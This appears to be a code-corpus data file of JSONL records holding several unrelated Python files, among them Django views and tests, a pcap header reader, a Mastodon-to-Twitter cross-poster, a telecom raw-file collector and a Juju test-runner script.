redirect('/')\n\n\tcontext = {'form':form}\n\treturn render(request, 'report/blade_update_form.html', context)\n\ndef updateInspection(request, pk):\n\tinspection = Inspection.objects.get(id=pk)\n\tform = InspectionForm(instance=inspection)\n\n\tif request.method == 'POST':\n\n\t\tform = InspectionForm(request.POST, instance=inspection)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('/')\n\n\tcontext = {'form':form}\n\treturn render(request, 'report/inspection_update_form.html', context)\n\ndef deleteOperation(request, pk):\n\toperation = Operation.objects.get(id=pk)\n\tif request.method == \"POST\":\n\t\toperation.delete()\n\t\treverse('/')\n\n\tcontext = {'item':operation}\n\treturn render(request, 'report/delete_operation.html', context)\n\ndef deleteBlade(request, pk):\n\tblade = Blade.objects.get(id=pk)\n\tif request.method == \"POST\":\n\t\tblade.delete()\n\t\treturn redirect('/')\n\n\tcontext = {'item':blade}\n\treturn render(request, 'report/delete_blade.html', context)\n\ndef deleteInspection(request, pk):\n\tinspection = Inspection.objects.get(id=pk)\n\tbladeid = inspection.blade\n\tprint(bladeid)\n\tif request.method == \"POST\":\n\t\tinspection.delete()\n\t\treturn redirect('/')\n\n\tcontext = {'item':inspection}\n\treturn render(request, 'report/delete_inspection.html', context)","sub_path":"report/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"16838036","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport io\n\nfrom ctypes import *\nfrom argparse import ArgumentParser\n\nclass PcapHeader(LittleEndianStructure):\n __hdr_len__ = 24\n _fields_ = (\n ('magic_num', c_uint32), # magic number\n ('major_ver', c_uint16), # major version\n ('minor_ver', c_uint16), # minor version\n ('timezone_offset', c_int32), \n ('timestamp_accuracy', c_uint32), \n ('snap_len', c_uint32), # snapshot_length : max size of each packet capture data\n ('link_type', c_uint32) # link-layer header type\n )\n\nclass PacketHeader(LittleEndianStructure):\n __hdr_len__ = 16\n _fields_ = (\n ('timestamp_sec', c_uint32),\n ('timestamp_usec', c_uint32),\n ('cap_len', c_uint32),\n ('pkt_len', c_uint32),\n )\n \n def __len__(self):\n return self.__hdr_len__\n\n\ndef show_pcap_header(pcap_header):\n print(f'magic number : {hex(pcap_header.magic_num)}')\n print(f'major version : {pcap_header.major_ver}')\n print(f'minor version : {pcap_header.minor_ver}')\n print(f'timezone offset : {pcap_header.timezone_offset}')\n print(f'timestamp_accuracy : {pcap_header.timestamp_accuracy}')\n print(f'snapshot length : {pcap_header.snap_len}')\n print(f'link-layer header type : {pcap_header.link_type}')\n\ndef show_packet_header(packet_header):\n print(f'timestamp_sec : {packet_header.timestamp_sec}')\n print(f'timestamp_usec : {packet_header.timestamp_usec}')\n print(f'capture length : {packet_header.cap_len}')\n print(f'packet length : {packet_header.pkt_len}')\n\ndef debug():\n import string\n\n file_name = 'kbd.pcap'\n # file_name = 'test.pcap'\n\n # buffer = io.BytesIO(string.ascii_lowercase.encode('utf-8')[:24])\n buffer = open(file_name, 'rb')\n ph = PcapHeader()\n pkth = PacketHeader()\n buffer.readinto(ph)\n show_pcap_header(ph)\n for _ in range(10):\n buffer.readinto(pkth)\n print('----------------------------')\n print('----------------------------')\n show_packet_header(pkth)\n print('----------------------------')\n print(buffer.read(24))\n\nif __name__ == '__main__':\n # Check debug flag\n parser = ArgumentParser()\n parser.add_argument(\"--debug\", action=\"store_true\")\n args = parser.parse_args()\n \n is_debug = args.debug\n\n if is_debug:\n debug()","sub_path":"pcap/pcap.py","file_name":"pcap.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"497478209","text":"from django.test import TestCase\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\nfrom unittest_data_provider import data_provider\n\nfrom ..models import Person\n\n\nclass NonAuthEditTestCase(TestCase):\n def test_edit_page_redirect(self):\n response = self.client.get(reverse('edit-view'))\n self.assertEqual(response.status_code, 302)\n\n def test_edit_page_redirects_to_home_page(self):\n response = self.client.get(reverse('edit-view'), follow=True)\n last_redirect = response.redirect_chain[-1][0]\n self.assertIn(\"/accounts/login/?next=/edit/\", last_redirect)\n self.assertEqual(response.status_code, 200)\n self.assertIn('Log in here', response.content)\n\n\nclass AuthEditTestCase(TestCase):\n def setUp(self):\n self.person = Person.objects.get(pk=1)\n self.user = User.objects.create_user('Jane', 'jane.doe@gmail.com',\n 'test')\n self.client.login(username='Jane', password='test')\n self.response = self.client.get(reverse('edit-view'))\n\n page_elements = lambda: (\n ('Edit contact details', response.content)\n self.assertIn('\"message\": \"An error occurred while updating data\"', response.content)\n else:\n self.assertIn('Edit contact details', response.content)\n self.assertNotIn('\"message\": \"An error occurred while updating data\"', response.content)\n\n @data_provider(ajax_requests)\n def test_form_submit_with_data(self, ajax_request):\n new_name = \"Martishka\"\n self.proper_data['first_name'] = new_name\n self.proper_data['is_ajax_request'] = ajax_request\n self.client.post(reverse('edit-view'), self.proper_data)\n person = Person.objects.get(pk=1)\n self.assertEqual(person.first_name, new_name)\n\n @data_provider(ajax_requests)\n def test_form_submit_redirect(self, ajax_request):\n self.proper_data['is_ajax_request'] = ajax_request\n\n response = self.client.post(reverse('edit-view'), self.proper_data,\n follow=True)\n self.assertEqual(response.status_code, 200)\n if ajax_request:\n self.assertNotIn('Contact Details', response.content)\n self.assertIn('\"message\": \"Data was successfully updated\"', response.content)\n else:\n self.assertIn('Contact Details', response.content)\n self.assertNotIn('\"message\": \"Data was successfully updated\"', response.content)\n","sub_path":"django_hello_world/hello/tests/EditTestCase.py","file_name":"EditTestCase.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"333395241","text":"# coding: utf-8\n\n\"\"\"\nMastodon -> Twitter cross-poster\n\"\"\"\n\nimport time\nimport re\nimport requests\nimport html\nimport tempfile\nimport os\nimport mimetypes\nimport sys\nfrom builtins import input\n\nfrom mastodon import Mastodon\nimport twitter\n\n# How long to wait between polls to the API, in seconds\nMASTODON_POLL_DELAY = 30\n\n# The Mastodon instance base URL. By default, https://mastodon.social/\nMASTODON_BASE_URL = \"https://mastodon.social\"\n\n# Some helpers copied out from python-twitter, because they're broken there\nURL_REGEXP = re.compile((\n r'('\n r'(?!(https?://|www\\.)?\\.|ftps?://|([0-9]+\\.){{1,3}}\\d+)' # exclude urls that start with \".\"\n r'(?:https?://|www\\.)*(?!.*@)(?:[\\w+-_]+[.])' # beginning of url\n r'(?:{0}\\b|' # all tlds\n r'(?:[:0-9]))' # port numbers & close off TLDs\n r'(?:[\\w+\\/]?[a-z0-9!\\*\\'\\(\\);:&=\\+\\$/%#\\[\\]\\-_\\.,~?])*' # path/query params\nr')').format(r'\\b|'.join(twitter.twitter_utils.TLDS)), re.U | re.I | re.X)\n\ndef calc_expected_status_length(status, short_url_length=23):\n replaced_chars = 0\n status_length = len(status)\n match = re.findall(URL_REGEXP, status)\n if len(match) >= 1:\n replaced_chars = len(''.join(map(lambda x: x[0], match)))\n status_length = status_length - replaced_chars + (short_url_length * len(match))\n return status_length\n\n# Boot-strap app and user information\nif not os.path.isfile(\"mtt_twitter.secret\"):\n print(\"This appears to be your first time running MastodonToTwitter.\")\n print(\"After some configuration, you'll be up and running in no time.\")\n print(\"First of all, to talk to twitter, you'll need a twitter API key.\")\n print(\"\\n\")\n print(\"Usually, the application creator is supposed to make that, but with\")\n print(\"an application that isn't a hosted service or a binary blob, with\")\n print(\"the key in plain text, this is not easily possible.\")\n print(\"\\n\")\n print(\"You'll need to register an app on https://apps.twitter.com/ .\")\n print(\"You may have to add a phone number to your twitter account to be able\")\n print(\"to do this.\")\n print(\"\\n\")\n print(\"Once you are done (make sure to allow your app write permissions),\")\n print(\"go to your apps 'Keys and Tokens' page and enter the info from there\")\n print(\"here.\")\n print(\"\\n\")\n\n twitter_works = False\n while not twitter_works:\n TWITTER_CONSUMER_KEY = input(\"Twitter Consumer Key (API Key): \").strip()\n TWITTER_CONSUMER_SECRET = input(\"Twitter Consumer Secret (API Secret): \").strip()\n TWITTER_ACCESS_KEY = input(\"Twitter Access Token: \").strip()\n TWITTER_ACCESS_SECRET = input(\"Twitter Access Token Secret: \").strip()\n \n print(\"\\n\")\n print(\"Alright, trying to connect to twitter with those credentials...\")\n print(\"\\n\")\n \n try:\n twitter_works = True \n twitter_api = twitter.Api(\n consumer_key = TWITTER_CONSUMER_KEY,\n consumer_secret = TWITTER_CONSUMER_SECRET,\n access_token_key = TWITTER_ACCESS_KEY,\n access_token_secret = TWITTER_ACCESS_SECRET\n )\n twitter_api.VerifyCredentials() \n except:\n twitter_works = False\n \n if twitter_works == False:\n print(\"Hmm, that didn't work. Check if you copied everything correctly\")\n print(\"and make sure you are connected to the internet.\")\n print(\"\\n\")\n\n print(\"Great! Twitter access works! With mastodon, the situation is a bit easier,\")\n print(\"all you'll have to do is enter your username (that you log in to mastodon\")\n print(\"with, this is usually your e-mail) and password.\")\n print(\"\\n\")\n\n mastodon_works = False\n while mastodon_works == False:\n MASTODON_USERNAME = input(\"Mastodon Username (e-mail): \").strip()\n MASTODON_PASSWORD = input(\"Mastodon Password: \").strip()\n\n print(\"\\n\")\n if os.path.isfile(\"mtt_mastodon_client.secret\"):\n print(\"You already have an app set up, so we're skipping that step.\")\n else:\n print(\"App creation should be automatic...\")\n try:\n Mastodon.create_app(\n \"MastodonToTwitter\", \n to_file = \"mtt_mastodon_client.secret\", \n scopes = [\"read\"], \n api_base_url = MASTODON_BASE_URL\n )\n except:\n print(\"... but it failed. That shouldn't really happen. Please retry \")\n print(\"from the start, and if it keeps not working, submit a bug report at\")\n print(\"http://github.com/halcy/MastodonToTwitter .\")\n sys.exit(0)\n print(\"...done! Next up, lets verify your login data.\")\n print(\"\\n\")\n \n try:\n mastodon_works = True\n mastodon_api = Mastodon(\n client_id = \"mtt_mastodon_client.secret\", \n api_base_url = MASTODON_BASE_URL\n )\n mastodon_api.log_in(\n username = MASTODON_USERNAME, \n password = MASTODON_PASSWORD, \n to_file = \"mtt_mastodon_user.secret\",\n scopes = [\"read\"]\n )\n except:\n mastodon_works = False\n \n if mastodon_works == False:\n print(\"Logging in didn't work. Check if you typed something wrong\")\n print(\"and make sure you are connected to the internet.\")\n print(\"\\n\")\n \n print(\"Alright, then, looks like you're all set!\")\n print(\"\\n\")\n print(\"Your credentials have been saved to three files ending in .secret in the\")\n print(\"current directory. While none of the files contain any of your passwords,\")\n print(\"the keys inside will allow people to access your Twitter and Mastodon\")\n print(\"accounts, so make sure other people cannot accces them!\")\n print(\"\\n\")\n print(\"The cross-poster will now start, and should post all your mastodon posts\")\n print(\"from this moment on to twitter while it is running! For future runs, you\")\n print(\"won't see any of these messages. To start over, simply delete all the .secret\")\n print(\"files. Have fun tooting!\")\n print(\"\\n\")\n \n with open(\"mtt_twitter.secret\", 'w') as secret_file:\n secret_file.write(TWITTER_CONSUMER_KEY + '\\n')\n secret_file.write(TWITTER_CONSUMER_SECRET + '\\n')\n secret_file.write(TWITTER_ACCESS_KEY + '\\n')\n secret_file.write(TWITTER_ACCESS_SECRET + '\\n')\n\n# Read in twitter credentials\nwith open(\"mtt_twitter.secret\", 'r') as secret_file:\n TWITTER_CONSUMER_KEY = secret_file.readline().rstrip()\n TWITTER_CONSUMER_SECRET = secret_file.readline().rstrip()\n TWITTER_ACCESS_KEY = secret_file.readline().rstrip()\n TWITTER_ACCESS_SECRET = secret_file.readline().rstrip()\n\t\n# Log in and start up\nmastodon_api = Mastodon(\n client_id = \"mtt_mastodon_client.secret\", \n access_token = \"mtt_mastodon_user.secret\", \n ratelimit_method=\"wait\",\n api_base_url = MASTODON_BASE_URL\n)\ntwitter_api = twitter.Api(\n consumer_key = TWITTER_CONSUMER_KEY,\n consumer_secret = TWITTER_CONSUMER_SECRET,\n access_token_key = TWITTER_ACCESS_KEY,\n access_token_secret = TWITTER_ACCESS_SECRET\n)\n\nmy_acct_id = mastodon_api.account_verify_credentials()[\"id\"]\nsince_toot_id = mastodon_api.account_statuses(my_acct_id)[0][\"id\"]\n\nwhile True:\n # Fetch new toots\n new_toots = mastodon_api.account_statuses(my_acct_id, since_id = since_toot_id)\n if len(new_toots) != 0:\n since_toot_id = new_toots[0][\"id\"]\n new_toots.reverse() \n \n print('Found new toots, processing:')\n for toot in new_toots:\n content = toot[\"content\"]\n media_attachments = toot[\"media_attachments\"]\n\n # We trust mastodon to return valid HTML\n content_clean = re.sub(r']*href=\"([^\"]+)\">[^<]*', '\\g<1>', content)\n content_clean = html.unescape(str(re.compile(r'<.*?>').sub(\"\", content_clean).strip()))\n \n # Don't cross-post replies\n if len(content_clean) != 0 and content_clean[0] == '@':\n print('Skipping toot \"' + content_clean + '\" - is a reply.')\n continue\n \n # Split toots, if need be, using Many magic numbers.\n content_parts = []\n if calc_expected_status_length(content_clean) > 140:\n print('Toot bigger 140 characters, need to split...')\n current_part = \"\"\n for next_word in content_clean.split(\" \"):\n # Need to split here?\n if calc_expected_status_length(current_part + \" \" + next_word) > 135:\n print(\"new part\")\n space_left = 135 - calc_expected_status_length(current_part) - 1\n\n # Want to split word?\n if len(next_word) > 30 and space_left > 5 and not twitter.twitter_utils.is_url(next_word): \n current_part = current_part + \" \" + next_word[:space_left]\n content_parts.append(current_part)\n current_part = next_word[space_left:]\n else:\n content_parts.append(current_part)\n current_part = next_word\n\n # Split potential overlong word in current_part\n while len(current_part) > 135:\n content_parts.append(current_part[:135])\n current_part = current_part[135:] \n else:\n # Just plop next word on\n current_part = current_part + \" \" + next_word\n \n # Insert last part\n if len(current_part.strip()) != 0 or len(content_parts) == 0:\n content_parts.append(current_part.strip())\n else:\n print('Toot smaller 140 chars, posting directly...')\n content_parts.append(content_clean)\n \n # Tweet all the parts. On error, give up and go on with the next toot.\n try:\n reply_to = None \n for i in range(len(content_parts)):\n media_ids = []\n content_tweet = content_parts[i] + \" --\"\n\n # Last content part: Upload media, no -- at the end\n if i == len(content_parts) - 1:\n for attachment in media_attachments:\n attachment_url = attachment[\"url\"]\n\n print('Downloading ' + attachment_url)\n attachment_file = requests.get(attachment_url, stream=True)\n attachment_file.raw.decode_content = True\n temp_file = tempfile.NamedTemporaryFile(delete = False)\n temp_file.write(attachment_file.raw.read())\n temp_file.close()\n\n file_extension = mimetypes.guess_extension(attachment_file.headers['Content-type'])\n upload_file_name = temp_file.name + file_extension\n os.rename(temp_file.name, upload_file_name)\n\n temp_file_read = open(upload_file_name, 'rb')\n print('Uploading ' + upload_file_name)\n media_ids.append(twitter_api.UploadMediaChunked(media = temp_file_read))\n temp_file_read.close()\n os.unlink(upload_file_name)\n\n content_tweet = content_parts[i]\n\n # Tweet\n if len(media_ids) == 0:\n print('Tweeting \"' + content_tweet + '\"...')\n reply_to = twitter_api.PostUpdate(content_tweet, in_reply_to_status_id = reply_to).id\n else:\n print('Tweeting \"' + content_tweet + '\", with attachments...')\n reply_to = twitter_api.PostUpdate(content_tweet, media = media_ids, in_reply_to_status_id = reply_to).id\n except:\n print(\"Encountererd error. Not retrying.\")\n \n print('Finished toot processing, resting until next toots.')\n time.sleep(MASTODON_POLL_DELAY)\n","sub_path":"MastodonToTwitter.py","file_name":"MastodonToTwitter.py","file_ext":"py","file_size_in_byte":12654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"404313925","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sale', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='OrderItem',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),\n ('marketplace_orderitem_id', models.CharField(max_length=15)),\n ('shipping_price', models.IntegerField()),\n ('quantity', models.IntegerField()),\n ('sku', models.CharField(max_length=15)),\n ('quantity_shipped', models.IntegerField()),\n ('price', models.IntegerField()),\n ('order', models.ForeignKey(to='sale.Order')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Product',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),\n ('vendor_id', models.CharField(max_length='12')),\n ('title', models.CharField(max_length=144)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='orderitem',\n name='product',\n field=models.ForeignKey(to='sale.Product'),\n preserve_default=True,\n ),\n ]\n","sub_path":"m13/sale/migrations/0002_auto_20141202_2022.py","file_name":"0002_auto_20141202_2022.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"510500328","text":"import os\nimport glob\nimport re\nfrom datetime import date\n\nimport yaml\nfrom pandas import *\n\nimport log\nfrom environment import *\nfrom scr.config.model.raw_file import RawFile\n\nVENDOR = 'Vendor'\nDEFAULT_MAPPING_SHEET_NAME = 0\n\n\ndef read_mapping_yaml():\n with open(MAPPING_FILE_PATH, 'r') as f:\n # doc = yaml.load(f)\n doc = yaml.safe_load(f)\n\n return doc\n\n\ndef read_data_source(vendor, region: str = None):\n\n if 'Ericsson' in vendor:\n vendor = ERICSSON_VENDOR\n elif 'Huawei' in vendor:\n vendor = HUAWEI_VENDOR\n elif 'ZTE' in vendor:\n vendor = ZTE_VENDOR\n \n # if vendor == ERICSSON_SW_VENDOR or vendor == ERICSSON_FEATURE_VENDOR:\n # vendor = ERICSSON_VENDOR\n\n yaml_value = read_mapping_yaml()\n\n xls = ExcelFile(RAW_FILE_PATH_COLLECTION)\n\n data_frame = xls.parse(xls.sheet_names[DEFAULT_MAPPING_SHEET_NAME])\n\n # print(data_frame.iterrows())\n\n raw_file_collection = []\n\n for index, row in data_frame.iterrows():\n\n # log.d(\"VENDOR : \" + row[VENDOR].upper(), vendor)\n # log.d(\"vendor : \" + vendor.upper(), vendor)\n\n if row[VENDOR].upper() != vendor.upper():\n continue\n\n raw_file = RawFile(row)\n # Read file mapping path from yaml\n \n try:\n if raw_file.FrequencyType in yaml_value[vendor]['network']:\n\n if region is not None:\n if str(raw_file.Region).lower() != region.lower():\n continue \n \n raw_file.FileMappingPath = CONFIGURATION_PATH + yaml_value[vendor]['network'][raw_file.FrequencyType]['mapping']\n if 'feature' in yaml_value[vendor] and raw_file.FrequencyType in yaml_value[vendor]['feature']:\n raw_file.FileMappingFeaturePath = CONFIGURATION_PATH + yaml_value[vendor]['feature'][raw_file.FrequencyType]['mapping']\n except:\n pass\n\n # Get valid file name in directory based on file format\n collect_file_within_path(vendor, raw_file)\n raw_file_collection.append(raw_file)\n\n return raw_file_collection\n\n\ndef collect_file_within_path(vendor, raw_file):\n log.i(\" \", vendor)\n log.i(vendor + \"_\" + raw_file.FrequencyType + \"_\" + raw_file.Region, vendor)\n log.i(\"Path : \" + raw_file.Path, vendor)\n\n if vendor == ZTE_VENDOR:\n return collect_zte_file(raw_file)\n elif vendor == HUAWEI_VENDOR:\n return collect_huawei_file(raw_file)\n elif vendor == ERICSSON_VENDOR:\n return collect_ericsson_file(raw_file)\n\n\ndef collect_huawei_file(raw_file):\n if raw_file.FrequencyType == '2G':\n collect_huawei_file_by_extension(raw_file, 'txt')\n elif raw_file.FrequencyType == '3G':\n collect_huawei_file_by_extension(raw_file, 'txt')\n elif raw_file.FrequencyType == '4G': \n # Fix LTE that now is xml.gz (compress)\n collect_huawei_file_by_extension(raw_file, 'xml.gz')\n # L2600\n collect_huawei_file_by_expression(raw_file)\n\n elif raw_file.FrequencyType == '5G':\n collect_huawei_file_by_expression(raw_file)\n # print(raw_file)\n\n\ndef collect_ericsson_file(raw_file):\n if raw_file.FrequencyType == '2G':\n collect_ericsson_2g_file(raw_file)\n elif raw_file.FrequencyType == '3G':\n collect_ericsson_file_by_extension(raw_file, 'log')\n elif raw_file.FrequencyType == '4G':\n collect_ericsson_file_by_extension(raw_file, 'log')\n elif raw_file.FrequencyType == '5G':\n collect_ericsson_file_by_extension(raw_file, 'log')\n\n\ndef collect_zte_file(raw_file): \n if raw_file.Path != '':\n for filename in glob.glob(raw_file.Path + '*.xml'):\n if re.match(raw_file.FileFormat.upper(), filename.upper()):\n raw_file.RawFileList.append(filename)\n\n log.i(\"Read file count : \" + str(raw_file.RawFileList.__len__()), ZTE_VENDOR)\n\ndef collect_ericsson_2g_file(raw_file):\n if raw_file.Path != '':\n for filename in glob.glob(raw_file.Path + '*.txt'):\n raw_file.RawFileList.append(filename)\n\n for filename in glob.glob(raw_file.Path + '*.log'):\n raw_file.RawFileList.append(filename)\n\ndef collect_huawei_file_by_expression(raw_file):\n if raw_file.Path != '':\n for filename in glob.glob(raw_file.Path + '*'):\n if re.match(raw_file.FileFormat.upper(), filename.upper()):\n timestamp = date.fromtimestamp(os.path.getctime(filename))\n if date.today() == timestamp:\n raw_file.RawFileList.append(filename)\n\n log.i(\"Read file count : \" + str(raw_file.RawFileList.__len__()), HUAWEI_VENDOR)\n\n\ndef collect_huawei_file_by_extension(raw_file, file_extension):\n file_name_format = raw_file.FileFormat.split('.')[0]\n if raw_file.Path != '':\n for filename in glob.glob(raw_file.Path + '*.' + file_extension):\n raw_file.RawFileList.append(filename)\n\n for filename in glob.glob(raw_file.Path + '*.' + file_extension.upper()):\n raw_file.RawFileList.append(filename)\n\n log.i(\"Read file count : \" + str(raw_file.RawFileList.__len__()), HUAWEI_VENDOR)\n\n\ndef collect_ericsson_file_by_extension(raw_file, file_extension):\n if raw_file.Path != '':\n for filename in glob.glob(raw_file.Path + '*.' + file_extension):\n raw_file.RawFileList.append(filename)\n\n log.i(\"Read file count : \" + str(raw_file.RawFileList.__len__()), ERICSSON_VENDOR)\n","sub_path":"scr/config/parser/data_source_parser.py","file_name":"data_source_parser.py","file_ext":"py","file_size_in_byte":5475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"65223517","text":"\nimport fotokat.util as util\nfrom fotokat.service.model import Model as Model\nimport numpy as np\n\ndef cmp(a, b, field):\n A = a[field] if field in a else ''\n B = b[field] if field in b else ''\n if not A:\n A = ''\n if not B:\n B = ''\n if not A and not B:\n return True\n return True if A.lower() == B.lower() else False\n\ndef cmp_author(a, b):\n field = 'author'\n A = a[field] if field in a else ''\n B = b[field] if field in b else ''\n if not A and not B:\n return True\n return True if A.lower() == ' '.join(B).lower() else False\n\n\ndef compare(result, basis):\n res = [0, 0, 0, 0]\n if not result or not basis:\n return res\n if cmp(result, basis, 'title'):\n res[0] = 1\n if cmp(result, basis, 'subtitle'):\n res[1] = 1\n if cmp(result, basis, 'publisher'):\n res[2] = 1\n if cmp_author(result, basis):\n res[3] = 1\n # print(res)\n return res\n \n\ndef compare_visual(result, basis, faust):\n print(f'Result: {result}')\n print(f'Basis: {basis}')\n if not result or not basis:\n return\n # Titel:\n print(f'Faust:\\t{faust}')\n res_title = result['title'] if 'title' in result else ''\n basis_title = basis['title'] if 'title' in basis else ''\n print(f'Title:\\t\\t{basis_title} | {res_title}')\n res_subtitle = result['subtitle'] if 'subtitle' in result else ''\n basis_subtitle = basis['subtitle'] if 'subtitle' in basis else ''\n print(f'Subitle:\\t{basis_subtitle} | {res_subtitle}')\n res_publisher = result['publisher'] if 'publisher' in result else ''\n basis_publisher = basis['publisher'] if 'publisher' in basis else ''\n print(f'Publisher:\\t{basis_publisher} | {res_publisher}')\n res_author = result['author'] if 'author' in result else ''\n basis_author = basis['author'] if 'author' in basis else ''\n print(f'Author:\\t\\t{basis_author} | {res_author}')\n \n \ndef calculate(modelname, directory='data/scan/validate'):\n print('For testing only!!!')\n model = Model(modelname)\n R = []\n for i, faust in enumerate(util.faust_generator(directory)):\n if i % 100 == 0:\n print(f'[{i}]')\n #break\n response = util.load_response(faust, directory)\n basisdata = util.load_basis(faust, directory)\n image = util.load_image(faust, directory)\n\n try:\n result = model.query(response, image)\n except ValueError:\n continue\n # compare_visual(result, basisdata, faust)\n comp = compare(result, basisdata)\n R.append(comp)\n\n if comp[2] == 0:\n print(faust)\n print(result)\n print(basisdata)\n \n R = np.array(R)\n means = np.mean(R, axis=0)\n accuracy = {}\n accuracy['title'] = means[0]\n accuracy['substitle'] = means[1]\n accuracy['publisher'] = means[2]\n accuracy['author'] = means[3]\n accuracy['all'] = np.mean(R)\n return accuracy\n","sub_path":"src/fotokat/service/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"497929221","text":"#!/usr/bin/python3\n\"\"\"Start link class to table in database\n\"\"\"\nimport sys\nfrom relationship_state import Base, State\nfrom relationship_city import City\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import (create_engine)\n\nif __name__ == \"__main__\":\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'.format(\n sys.argv[1],\n sys.argv[2],\n sys.argv[3]),\n pool_pre_ping=True)\n session = sessionmaker(bind=engine)\n s1 = session()\n result = s1.query(State).join(City).filter(State.id == City.state_id).all()\n for row in result:\n for city in row.cities:\n print(\"{}: {} -> {}\".format(city.id, city.name, row.name))\n","sub_path":"0x0F-python-object_relational_mapping/102-relationship_cities_states_list.py","file_name":"102-relationship_cities_states_list.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"281393772","text":"#!/usr/bin/python3\n\nimport os\nimport subprocess\nimport re\nfrom argparse import ArgumentParser\nfrom wand import run\nfrom datetime import datetime\n\n\"\"\"\nRun juju tests.\n1. Build Juju\n2. If anything changed, run tests\n3. If any tests didn't compile, exit\n4. If any tests failed, re-run them.\n\nOptions:\n --force to run tests even if 'make install' didn't return any output.\n --rerun just re-run the failing tests from the last run, don't rebuild.\n\"\"\"\n\n\ndef main(args):\n long_tests = {\n 'state': 270,\n 'mongo': 19,\n }\n start_time = datetime.now()\n try:\n install_out = run('go install -v github.com/juju/juju/...')\n except subprocess.CalledProcessError as e:\n exit(e.returncode)\n output_filename = os.path.join(os.path.expanduser('~'),\n '.jujutestoutput.txt')\n rerun_filename = os.path.join(os.path.expanduser('~'),\n '.jujutestoutput_rerun.txt')\n\n print('Build duration:', datetime.now() - start_time)\n start_time = datetime.now()\n\n filename = None\n packages = []\n if args.changed:\n git_status = run('git status', quiet=True)\n # TODO: support new, deleted, modified, moved etc.\n for line in git_status.splitlines():\n mod = re.search('modified:\\s+(.*)/.*?\\.go$', line)\n if mod and mod.group(1) not in packages:\n packages.append(mod.group(1))\n filename = output_filename\n\n # Sort packages to do long tests last\n # TODO: long tests first, in parallel...\n packages = sorted(packages, key=lambda p: long_tests.get(p, 0))\n print(packages)\n\n with open(output_filename, 'w') as f:\n for package in packages:\n test_out, rc = run('GOMAXPROCS=32 go test github.com/juju/juju/' + package, write_to=f, fail_ok=True)\n if rc:\n exit(rc)\n print('Test duration:', datetime.now() - start_time)\n start_time = datetime.now()\n exit(0)\n\n if (len(install_out) or args.force) and not args.rerun:\n if os.path.isfile(rerun_filename):\n os.remove(rerun_filename)\n\n filename = output_filename\n with open(output_filename, 'w') as f:\n test_out, rc = run('go test ./...', write_to=f, fail_ok=True)\n print('Test duration:', datetime.now() - start_time)\n start_time = datetime.now()\n\n else:\n # Don't have a new binary, so just re-run tests\n if os.path.isfile(rerun_filename):\n filename = rerun_filename\n elif os.path.isfile(output_filename):\n filename = output_filename\n\n if filename is None:\n return\n\n with open(filename) as f:\n test_out = f.readlines()\n\n unrecoverable = False\n re_run = []\n for line in test_out:\n if(not re.search('FAIL\\s+github.*\\n', line) and\n not line.startswith('# github.com')):\n continue\n\n if re.search('failed\\]\\s*$', line):\n # Build failed or setup failed. No point re-running, but need\n # to report\n unrecoverable = True\n elif line.startswith('# github.com'):\n unrecoverable = True\n print(line)\n else:\n s = re.search('FAIL\\s+(github.com.*)\\s[\\d\\.]+s\\s*$', line)\n re_run.append(s.group(1))\n\n if len(re_run) == 0:\n return\n\n print('-' * 20, 'Failing packages', '-' * 20)\n for package in re_run:\n print(' ', package)\n\n if not unrecoverable:\n print('Re-running failed tests...')\n with open(rerun_filename, 'w') as f:\n for package in re_run:\n out, rc = run('go test ' + package, write_to=f, fail_ok=True)\n print('Re-run duration:', datetime.now() - start_time)\n start_time = datetime.now()\n else:\n print('Some failures are unrecoverable... not re-running.')\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--force', action='store_true')\n parser.add_argument('--rerun', action='store_true')\n parser.add_argument('--changed', action='store_true')\n args = parser.parse_args()\n main(args)\n","sub_path":"testJuju.py","file_name":"testJuju.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"505501130","text":"# from nce_log.run_log import read_csv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# 手机错误信息分布\ndef phone_mobile():\n\n # 实例化对象\n datas = read_csv()\n # 初始化计数器\n count_phoneModel = dict()\n\n for row in datas:\n # 手机型号计数\n count_phoneModel[row[8]] = count_phoneModel.get(row[8], 0) + 1\n\n print(count_phoneModel)\n return count_phoneModel\n\n# 系统型号分布\ndef phone_os():\n\n # 实例化对象\n datas = read_csv()\n count_os = dict()\n\n for row in datas:\n # 操作系统\n count_os[row[9]] = count_os.get(row[9], 0) + 1\n\n print(count_os)\n return count_os\n\n# 报错信息分布\ndef errinfo():\n # 实例化对象\n datas = read_csv()\n # 初始化计数器\n count_errinfo = dict()\n\n 